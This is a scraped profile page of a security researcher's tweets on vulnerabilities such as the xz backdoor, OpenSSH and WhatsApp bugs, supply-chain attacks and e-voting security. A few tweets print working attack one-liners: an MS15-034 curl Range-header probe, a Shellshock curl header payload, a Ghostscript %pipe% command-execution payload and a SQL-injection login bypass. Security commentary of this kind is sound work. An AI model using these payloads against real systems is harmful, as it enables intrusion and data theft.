Juliano Rizzo Profile Banner
Juliano Rizzo Profile
Juliano Rizzo

@julianor

Followers
9,638
Following
1,947
Media
396
Statuses
15,333

Crypto. Security.

Metaverse
Joined October 2008
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@julianor
Juliano Rizzo
1 month
Jia Tan's git commit to turn off Landlock sandboxing one week after Lasse Collin improved it. I understand the sandbox is for xz, the command line tool, and Jia did not need to disable it for the SSHD backdoor. 🤔The xz command also activates the backdoor?
Tweet media one
11
166
1K
@julianor
Juliano Rizzo
3 years
CVE-2020-27020 "every instance of Kaspersky Password Manager in the world will generate the exact same password at a given second" Reported 2 years ago "June 15, 2019: report and proof of concept sent to through HackerOne."
23
304
1K
@julianor
Juliano Rizzo
1 month
xz/lzma backdoor: 🔬 Discovered and analyzed by Andres Freund while investigating performance issues 🔎 GitHub "JiaT75" contributions now being audited 🐧Affected distros: Debian sid, Fedora 41/Rawhide, Arch Linux (5.6.1-1), NixOS unstable ☠️ Narrowly avoided wider impact
@julianor
Juliano Rizzo
1 month
The xz/liblzma CVE-2024-3094 backdoor is door with a key: 🕵️Obfuscated code hidden in test data files 🎯Injects code during Debian or RPM package build process 🔐Redirects crypto functions used during SSH logins 👻 Tries to evade analysis & debugging 🔎Detected by Andres Freund
5
72
308
9
184
561
@julianor
Juliano Rizzo
1 month
Jia Tan's XZ attack was steps away from owning millions of devices. Buildroot uses & recommends XZ for images & upstream package code. Switching the XZ_SITE var to the "xz." subdomain in this config could've been enough but In this patch it is accepted only for documentation.
Tweet media one
Tweet media two
2
74
404
@julianor
Juliano Rizzo
1 month
Reverse engineering by @amlweems reveals 3 flaws that allows attackers to use the backdoor without the private key, using only a captured message signed for the target host: 1. Lack of replay protection 2. Symmetric encryption with a hardcoded key, 3. Partially signed commands
Tweet media one
@amlweems
Anthony Weems
1 month
I've been reverse engineering the xz backdoor this weekend and have documented the payload format and written a proof-of-concept exploit for the RCE. The payloads are signed with an ED448 key, so I patched my own key into the backdoor for testing. :-)
Tweet media one
54
915
4K
6
105
389
@julianor
Juliano Rizzo
3 years
infosec Twitter excited about yet another Linux priv escalation bug 🥱(who cares, unix priv separation 50 years of fail) but no comments about the WhatsApp RCE without any boomer memory corruption technique being used? Thread
4
80
314
@julianor
Juliano Rizzo
1 month
The xz/liblzma CVE-2024-3094 backdoor is door with a key: 🕵️Obfuscated code hidden in test data files 🎯Injects code during Debian or RPM package build process 🔐Redirects crypto functions used during SSH logins 👻 Tries to evade analysis & debugging 🔎Detected by Andres Freund
5
72
308
@julianor
Juliano Rizzo
3 years
"The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9."
@GHSecurityLab
GitHub Security Lab
3 years
GHSL-2021-1012: Poor random number generation in keypair - CVE-2021-41117 -
3
38
145
9
75
269
@julianor
Juliano Rizzo
2 years
us-east-1 down, web3 revolution suspended
3
38
262
@julianor
Juliano Rizzo
4 years
The end is near. 2020 does not forgive. "15 years later: Remote Code Execution in qmail (CVE-2005-1513)"
2
98
234
@julianor
Juliano Rizzo
10 months
CVE-2023-38408: Remote Code Execution in OpenSSH's forwarded ssh-agent
@julianor
Juliano Rizzo
10 months
🔥CVE-2023-38408: "Surprisingly, by chaining 4 common side effects of shared libs from official distribution packages, we were able to transform this very limited primitive (dlopen and dlclose of shared libraries from /usr/lib*) into a reliable, one-shot remote code execution"
1
28
71
2
108
210
@julianor
Juliano Rizzo
7 years
Internet threat level: MEDIUM
0
62
140
@julianor
Juliano Rizzo
2 years
Tried to investigate the Solana wallet key theft issue but are all the wallets closed source? Seriously?
11
19
141
@julianor
Juliano Rizzo
6 years
The barrier to remote code execution in a *secure* chat app is of this regex that looks like x86 shellcode? 😕const URL_REGEX = /(^|[\s\n]|<br\/?>)((?:https?|ftp):\/\/[-A-Z0-9\u00A0-\uD7FF\uE000-\uFDCF\uFDF0-\uFFFD+\u0026\u2019@#/%?=()~_|!:,.;]*[-A-Z0-9+\u0026@#/%=~()_|])/gi;
5
62
125
@julianor
Juliano Rizzo
10 years
"100% reliable and portable exploit for MobileSafari on IOS7.1.x. can be downloaded from github" CVE-2014-4377 #ios8 http://t.co/dGWm5V7h4L
5
138
115
@julianor
Juliano Rizzo
2 years
The Volkswagen attack but for apps! "For example, an app could determine whether it was in Apple's review process, changing its UI so as not to fall foul of any App Store guidelines before unleashing popups asking for money on unsuspecting users. "
@keleftheriou
Kosta Eleftheriou
2 years
👀 “An investigation into seven different apps on the Mac App Store, including the number one PDF reader in the U.S., has found that all of them are orchestrated by the same Chinese developer using fake reviews and command-and-control exploits to try and target users.”
3
67
157
3
54
118
@julianor
Juliano Rizzo
5 years
"Radiofrequency radiation exposure from the iPhone 7 — one of the most popular smartphones ever sold — measured over the legal safety limit and more than double what Apple reported to federal regulators from its own testing" 🍎📱☠️
4
61
104
@julianor
Juliano Rizzo
14 days
"how I hacked Google": dependency confusion
Tweet media one
2
31
95
@julianor
Juliano Rizzo
8 years
it took courage
Tweet media one
1
80
84
@julianor
Juliano Rizzo
1 month
🤔🤥 The analysis Andres Freund did was without reading the source code, observing the system using tools like perf and gdb that do not require source code. 🗨️From his email: "most of what I observed is purely from observation."
@esrtweet
Eric S. Raymond
1 month
2/ Open source worked the way it's supposed to. Some hacker noticed something that made him curious, poked at it because hackers are like that, and because the code was open and availablwe for inpection, diagnosed the problem before any serious harm was done.
7
99
1K
2
13
86
@julianor
Juliano Rizzo
10 years
SSL/TLS Triple Handshake Attack Demo client cert authentication broken. Web exploit. http://t.co/OHxx0u9XCi
Tweet media one
4
91
80
@julianor
Juliano Rizzo
5 years
🤦‍♂️😳😥 Programmer was spied, raided, computer devices taken to examine personal files. Reasons provided by police "investigation" about an email leak? tweets about Java, Python, nginx, electronic voting systems, and being critic about the security of gov systems. Argentina.
@mis2centavos
Javier Smaldone
5 years
Y hablando de cuestiones técnicas, parece que la @PFAOficial hasta hizo un diagrama con mis supuestas habilidaded. (Aclaro: no programo en java ni que me corten un brazo).
Tweet media one
28
54
251
0
43
81
@julianor
Juliano Rizzo
6 years
⚠️ don't use java.util.Random to generate cryptocurrency private keys.
5
44
81
@julianor
Juliano Rizzo
1 month
Jared Allard, 1Password employee, GitHub's account made a PR to update a dependency to the backdored version:
@julianor
Juliano Rizzo
1 month
xz/lzma backdoor: 🔬 Discovered and analyzed by Andres Freund while investigating performance issues 🔎 GitHub "JiaT75" contributions now being audited 🐧Affected distros: Debian sid, Fedora 41/Rawhide, Arch Linux (5.6.1-1), NixOS unstable ☠️ Narrowly avoided wider impact
9
184
561
3
11
77
@julianor
Juliano Rizzo
5 years
"With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer. We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits"
1
33
76
@julianor
Juliano Rizzo
7 years
Another Jenkins unauthenticated remote code execution serialization exploit. supply chain attacks 😱🚨
1
73
74
@julianor
Juliano Rizzo
3 years
Just as when I cook I can hear the voice of loved ones giving directions I will remember your wise advice when I read or write code @ajlopez ♥️ baby steps, KISS, TDD :)
Tweet media one
4
6
73
@julianor
Juliano Rizzo
4 years
not a backdoor! but.. this is how electron apps update ? (found while reviewing something else)
Tweet media one
5
15
73
@julianor
Juliano Rizzo
8 years
Use Pen. Use Paper.
2
39
68
@julianor
Juliano Rizzo
10 months
🔥CVE-2023-38408: "Surprisingly, by chaining 4 common side effects of shared libs from official distribution packages, we were able to transform this very limited primitive (dlopen and dlclose of shared libraries from /usr/lib*) into a reliable, one-shot remote code execution"
1
28
71
@julianor
Juliano Rizzo
7 years
Chromecast starts an open WiFi AP if it gets disconnected from your AP, and it has the key of your WiFi network and at least 3 TCP services
5
45
66
@julianor
Juliano Rizzo
3 years
\o WhatsApp stores SSL/TLS secrets and some useful info for attackers in /sdcard. Bad. Attackers can get the secrets from JS code in a HTML attachment and use them to hijack connections between WhatsApp and servers. Bad but ehhh2eeehh encryption ...
1
17
65
@julianor
Juliano Rizzo
27 days
🔎Researchers are working hard but still need to conclude the XZ backdoor analysis and determine whether it has alternative communication channels or triggers. 🎁The xz-min project by @felipec is a way to easily reproduce the XZ backdoor to study it:
Tweet media one
1
29
64
@julianor
Juliano Rizzo
4 years
Second public Auth0 JWT critical bug IIRC "JWT Validation Bypass in Auth0 Authentication API" "does not adequately validate a user’s JWT token, allowing an attacker to forge a JWT for any user by creating a JWT with an algorithm of ‘none’ " JWT->🗑️
3
29
63
@julianor
Juliano Rizzo
3 years
I was asked what improved in the last 20 years, I said "at least we don't have RCE in Apache"
2
3
62
@julianor
Juliano Rizzo
8 years
"The code can't be 'hacked.' It can only be used" You don't break software when you exploit it, you just demonstrate that it was broken.
1
58
59
@julianor
Juliano Rizzo
1 year
1/ 🧵Recently, I've come across rumors about security issues at #Cloudflare , and it's really worrisome. High-impact attacks have been reported, somehow abusing their API. I can't believe this has been circulating for so long without any clarification.
4
25
62
@julianor
Juliano Rizzo
3 years
"Unfortunately, it's the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers."
2
9
61
@julianor
Juliano Rizzo
7 years
Por cierto, asi como trabajamos gratis para ilustrar riesgo de voto informático, contribuiriamos a un proyecto serio de tecnología electoral
1
27
59
@julianor
Juliano Rizzo
1 month
@adtac_ or just start a reverse shell, all that work for the backdoor and limit communication channel only to exposed SSH services? 🤔
1
1
59
@julianor
Juliano Rizzo
6 years
fork(); 😀👍🏿
16
3
58
@julianor
Juliano Rizzo
3 years
\o/ Detailed post: 👏👏
2
20
58
@julianor
Juliano Rizzo
3 years
The most effective supply chain attack? Stack Overflow
3
9
58
@julianor
Juliano Rizzo
6 years
'or'1'='1 but without quotes.
@Corrupted_brain
Oops!
6 years
Awesome login bypass by @brutelogic
Tweet media one
19
624
2K
0
28
55
@julianor
Juliano Rizzo
10 years
SSL/TLS Checklist for Pentesters -Manual Configuration Tests Cheatsheet http://t.co/RA7jPFfUL2
0
52
57
@julianor
Juliano Rizzo
5 years
"For ECDSA signatures, the nonce K becomes significantly biased with up to 80 of the 256 bits being static, resulting in weakened signatures. This could allow an attacker who gains access to several signatures to reconstruct the private key."🤔
@Yubico
Yubico | #YubiKey
5 years
Yubico has discovered and fixed an issue with our YubiKey FIPS Series keys, see the following Advisory for technical details and information on how to obtain a free replacement device. No other YubiKey, Security Key or Yubico products are affected.
4
120
130
0
42
57
@julianor
Juliano Rizzo
1 month
CVE-2024-3094 XZ Utils shell script analysis by @gynvael highlights: 🕵️‍♂️ Multi-stage 🌳 Living off the land techniques (AWK RC4 encryption) 🧩 Extension mechanism for future updates through binary test files 🕵️‍♀️ Simple but effective obfuscation for evasion
0
16
56
@julianor
Juliano Rizzo
7 years
"Unfortunately, OpenPGP has a few spots where SHA-1 is hardwired into the design. For example, key fingerprints cannot be anything else"
2
80
54
@julianor
Juliano Rizzo
7 years
internet security, so fragile.
10
64
54
@julianor
Juliano Rizzo
3 years
Attacks on the software supply chain are "the attack", anything can be hacked this way. Malicious npm packages are one of the easiest. The recently detected attacks are loud - cryptocurrency mining CPU usage or broken builds. The most subtle and targeted not being detected.
1
20
53
@julianor
Juliano Rizzo
3 months
🎻 Spoiler: new post-quantum (🤌) code is packed with bugs that turn your private conversations into an open book for memory corruption exploit artists. 🪄But fear not, you're protected against adversaries wielding imaginary computers.
@matthew_d_green
Matthew Green
3 months
So Apple has gone and updated the iMessage protocol to incorporate both forward security (very good!) and post-quantum cryptography.
26
369
1K
4
13
54
@julianor
Juliano Rizzo
2 years
Chip Red Pill :
Tweet media one
1
19
52
@julianor
Juliano Rizzo
7 years
" I realized that this bug was first reported to Microsoft in 1997, making it older than I am. "😏
1
45
49
@julianor
Juliano Rizzo
3 years
Exploiting Linux Kernel futex CVE-2021-3347 CVE-2014-3153
1
20
53
@julianor
Juliano Rizzo
9 years
MS15-034 x=$[$(curl -sk $URLFILE -w"%{size_download}" -oo)-1];curl -sk $URLFILE -H"Range: bytes=$x-18446744073709551615" -o dmp;od -x dmp
1
55
52
@julianor
Juliano Rizzo
6 years
infosec job security "Passing a number as the first argument to Buffer() (e.g. new Buffer(10)) allocates a new Buffer object of the specified size. Prior to Node.js 8.0.0, the memory allocated for such Buffer instances is not initialized and can contain sensitive data."
2
24
50
@julianor
Juliano Rizzo
5 years
SIM swap en Argentina es demasiado fácil. Por ejemplo, en un local de la empresa pedís cambiar de Micro a Nano y no verifican identidad como deberían. No uses SMS como segundo factor para nada importante.
3
19
52
@julianor
Juliano Rizzo
8 years
Google Wave failed but the demo was interesting, exciting, interesting problems solved, ambitious. Recent product demos are so lame.
2
10
48
@julianor
Juliano Rizzo
4 years
If Windows Electron app uses electron-builder autoupdate, it downloads .yml file from url set in package.json. The download temp file name includes a string from the .yml file (url decoded) and is passed to Powershell unescaped. RCE from update server bypassing sig verification.
3
25
50
@julianor
Juliano Rizzo
6 years
"Use Signal " the twitter security expert said. 2 wormeable remote code execution bugs in less than a week.
@HacKanCuBa
💚🧡 𝘏𝘢𝘤𝘒𝘢𝘯
6 years
New variant of our vulnerability found in signal-deskop, already patched in v1.11.0 Here's the write-up w/ messages exfiltration PoC: And the advisory: Found by @IAmMandatory cc @ortegaalfredo @julianor #CVE -2018-11101
1
63
63
7
29
45
@julianor
Juliano Rizzo
10 years
Internal Server Error (500) or empty reply means vulnerable: curl -H"test:() { test; }; /usr/bin/yes" server CVE-2014-6271:
0
45
46
@julianor
Juliano Rizzo
10 years
impressive exploit for nginx<=1.4.0 CVE-2013-2028 by sorbo http://t.co/8qWNYF2T1z 64bit,finds canary byte by byte,blind rop, tcp frag,8-o ..
0
48
48
@julianor
Juliano Rizzo
7 years
#BoletaUnicaPapelYa No poner computadoras donde no hacen falta. Todavía no podemos ni lograr que estas hagan sólo lo que el dueño quiera.
2
40
45
@julianor
Juliano Rizzo
1 year
@dystopiabreaker I suspect it is hallucinated but it should be easy to trigger it with a fame moon if that is the case
1
0
47
@julianor
Juliano Rizzo
5 years
The agile scam: it solves everything if 'properly implemented'
@perrymetzger
Perry E. Metzger
5 years
This is a misconception. Properly implemented, agile methods dramatically reduce security risk. See my direct replies for more, but the summary is, policies are best implemented as software, not as documents everyone ignores.
0
1
3
7
13
48
@julianor
Juliano Rizzo
3 years
Ethereum geth bug exploited using STATICCALL
Tweet media one
2
18
47
@julianor
Juliano Rizzo
10 years
'I was an idiot and assumed that the "random" button on http://t.co/5BG14kGfwU was truly random" $20k life lesson http://t.co/Q4nU2XSWMI
Tweet media one
8
64
46
@julianor
Juliano Rizzo
6 years
Every React project using "dangerouslySetInnerHTML" I have reviewed was exploitable. Yes! "dangerously" is the name Yes! devs use it anyway for security apps (encrypted chat, wallets) commit "Move to react for newlines, emoji, and links in message body"
2
20
46
@julianor
Juliano Rizzo
7 years
A computational algebra system in Smalltalk by a bored hacker
Tweet media one
1
26
44
@julianor
Juliano Rizzo
10 years
EASTER attack: Even More Critical Bugs in SSL/TLS impl.(Java) http://t.co/DXOifYTIjX "only about 73710 queries in mean for a 4096 RSA"
3
93
44
@julianor
Juliano Rizzo
7 years
Current Internet threat level after #ShadowBrokers dump + Linux UDP RCE #internetthreatlevel HIGH RISK
3
37
39
@julianor
Juliano Rizzo
5 years
"it is astounding that no one who wrote the MCAS software for the 737 Max seems even to have raised the possibility of using multiple inputs, including the opposite angle-of-attack sensor, in the computer’s determination of an impending stall. .."
0
27
40
@julianor
Juliano Rizzo
9 years
don't be surprised if SSRF + will be used in a few remote root exploits next year. + cool crypto bug? perhaps
1
29
39
@julianor
Juliano Rizzo
7 years
Exploiting Android S-Boot 👍Read it if you want to know how Android boots and can be attacked from USB
1
35
39
@julianor
Juliano Rizzo
6 years
the most gorgeous cryptocurrency p2p network stats web app just unveiled by @RSKsmart 😍👍🏿
Tweet media one
1
12
38
@julianor
Juliano Rizzo
9 years
reprogram 4G modems via SMS, make them act as keyboard -> reboot -> act as storage -> install bootkit. 8-o http://t.co/mcnj0WOLHU
3
69
39
@julianor
Juliano Rizzo
3 years
😱
Tweet media one
0
16
37
@julianor
Juliano Rizzo
10 months
RIP Condor. When I was ~11 years old I collected newspaper clippings about hacking (no Internet yet 👴) and many were about his story (at least a version of it). Around 2002 he emailed me asking for sendmail exploit ( @lcamtuf bug) Treasured mail, printed and saved but lost now.
@WeldPond
Weld Pond | Chris Wysopal
10 months
We've lost a true pioneer of the digital world, Kevin Mitnick. His ingenuity challenged systems, incited dialogues, and pushed boundaries in cybersecurity. He will remain a testament to the uncharted power of curiosity. #RIPKevinMitnick
Tweet media one
80
861
3K
1
7
39
@julianor
Juliano Rizzo
7 years
Hackers having fun with .ar electronic voting system. Cool demo today at Congress (if gov.ar doesn't find a way to cancel or delay it again)
@mis2centavos2
#NOalVotoElectrónico #BoletaÚnicaPapelYA 🗳
7 years
Mirá, @mgwechsler . Anoche nos acordamos de vos.
Tweet media one
6
10
20
0
28
37
@julianor
Juliano Rizzo
10 years
Successful private key extraction from OpenVPN (server) using #Heartbleed
0
71
38
@julianor
Juliano Rizzo
6 years
UI to make this process easier would be useful: Guide to using YubiKey as a SmartCard for GPG and SSH @Yubico
2
15
36
@julianor
Juliano Rizzo
11 years
Learn and save the world: The Layman's Guide to IC Reverse Engineering http://t.co/7SS0d1pJra
0
19
35
@julianor
Juliano Rizzo
1 year
1/🧵 It's crucial to understand how Cloudflare Worker-based MITM attacks can impact dApps, web wallets, and other services. Let's dive into the mechanics of these attacks, and what you should know to protect yourself:
1
12
35
@julianor
Juliano Rizzo
9 years
MS015-034 a new Heartbleed? try: Range: bytes:(filesize-1)-18446744073709551615 I get extra bytes
1
54
37
@julianor
Juliano Rizzo
1 year
Ledger Recover controversy: I asked if after the update the seed leaves the most secure part of the SE: btchip: "Official statements will be available on our twitter account. This firmware update introduces a new API to return the seed shards to the Dashboard, correct" 🧵
2
6
33
@julianor
Juliano Rizzo
8 years
"PWNED": .ar Justice confirms Vot.Ar electronic voting server security was broken and no damage done by bug reporter
@_joac
joac
8 years
Si, lo dice la justicia: Le hice un favor a MSA
Tweet media one
Tweet media two
37
464
584
0
42
32
@julianor
Juliano Rizzo
1 year
If you're developing a crypto wallet app, it's especially important to be cautious about using third-party libraries in production. Telemetry, crash reporting, and other libs can be useful tools for app developers, but they also come with some risks beyond privacy issues. 1/6
4
14
34
@julianor
Juliano Rizzo
7 years
I have no words to describe the genius of @TurroSec ...they made a hacker sticker album
Tweet media one
3
13
36
@julianor
Juliano Rizzo
7 years
0day exploit prices: * AV remote, Office/PDF reader: $50k * Chrome: $150k
Tweet media one
3
28
35
@julianor
Juliano Rizzo
6 years
😱 %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops
2
17
35
@julianor
Juliano Rizzo
2 years
For DALLE-E a perfect mate drink has two straws 🤔🧉
Tweet media one
7
5
36
@julianor
Juliano Rizzo
5 years
"It is worth noting that even though the project was coded in Rust, the audit team found vulnerabilities that resulted in remote code execution and memory corruption." 🎤
@grincouncil
Grin Council
5 years
Results from Grin's 2nd security audit are now published. A big thanks to @coinspect , j01tz, and all the 💛Grin donors💛 who made this work possible. ツ
16
8
46
2
12
36
@julianor
Juliano Rizzo
10 years
James Iry’s history of programming languages (illustrated with pictures and large fonts) http://t.co/KTzEmgj4SU http://t.co/0Vp11pLawb
Tweet media one
0
38
35
@julianor
Juliano Rizzo
4 years
some believed cryptocurrency incentives were going to make p2p networks like Tor better: "They replaced bitcoin addresses in HTTP traffic to redirect transactions to their wallets instead of the user provided bitcoin address"
@emax
electronic Max
4 years
wow, an attacker recently controlled up to 24% the exit relay capacity of the tor network, seemingly all for a cryptocurrency scam. this is crazy >
0
32
46
2
19
33
@julianor
Juliano Rizzo
12 years
CRIME attack slides comments enabled and welcome #ekoparty2012
2
101
34
@julianor
Juliano Rizzo
3 years
../ To make this RCE chains easier WhatsApps stores native libraries in /data/data/com.whatsapp/files/decompressed/libs.spk.zst 🤷‍♂️attackers can use the .zip bug to overwrite any of them (I would go for the Rust ones) and execute arbitrary code.
2
5
33